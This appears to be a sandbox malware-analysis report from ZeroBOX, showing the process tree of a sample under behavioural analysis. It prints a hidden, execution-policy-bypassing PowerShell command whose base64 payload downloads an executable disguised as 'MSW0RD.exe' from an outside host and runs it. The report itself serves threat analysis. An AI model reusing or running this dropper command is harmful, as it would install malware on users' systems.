| ZeroBOX

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\Hjkjhgue.ps1
3008
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPasS -nOp -W hiDden -Ec IAAJAEkAbgB2AE8AawBFAC0AUgBFAHMAVABtAGUAVABoAG8AZAAgAAkALQBVAFIAaQAgAAkAKAAdIGgAdAB0AHAAOgAvAC8AbwBmAGYAaQAdICAAIAAgACAAKwAgACAAHSBjAGkAYQBsAC4AeQBkAG4AcwAuAGUAdQAvAG8AZgBmAC8ATABmAGgAeAByAEUAVABSAFIARwB4AGUAcgBaAGUAcgBlAHgAHSAgACAAIAAgACsAIAAgAB0gZwBmAEMAHSAgACAAIAAgACsAIAAgAB0gdABlAHgALgBlAB0gIAAgACAAIAArACAAIAAdIHgAZQAdICAAIAApACAALQBvAHUAdABmAGkATABlACAAHSAkAEUAbgBWADoAdABFAG0AcABcAE0AUwBXADAAUgBEAC4AZQB4AGUAHSAgAAkAOwAgACYAIAAJAB0gJABFAG4AVgA6AHQAZQBNAHAAXABNAFMAVwAwAFIARAAuAGUAeABlAB0g
  1784

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis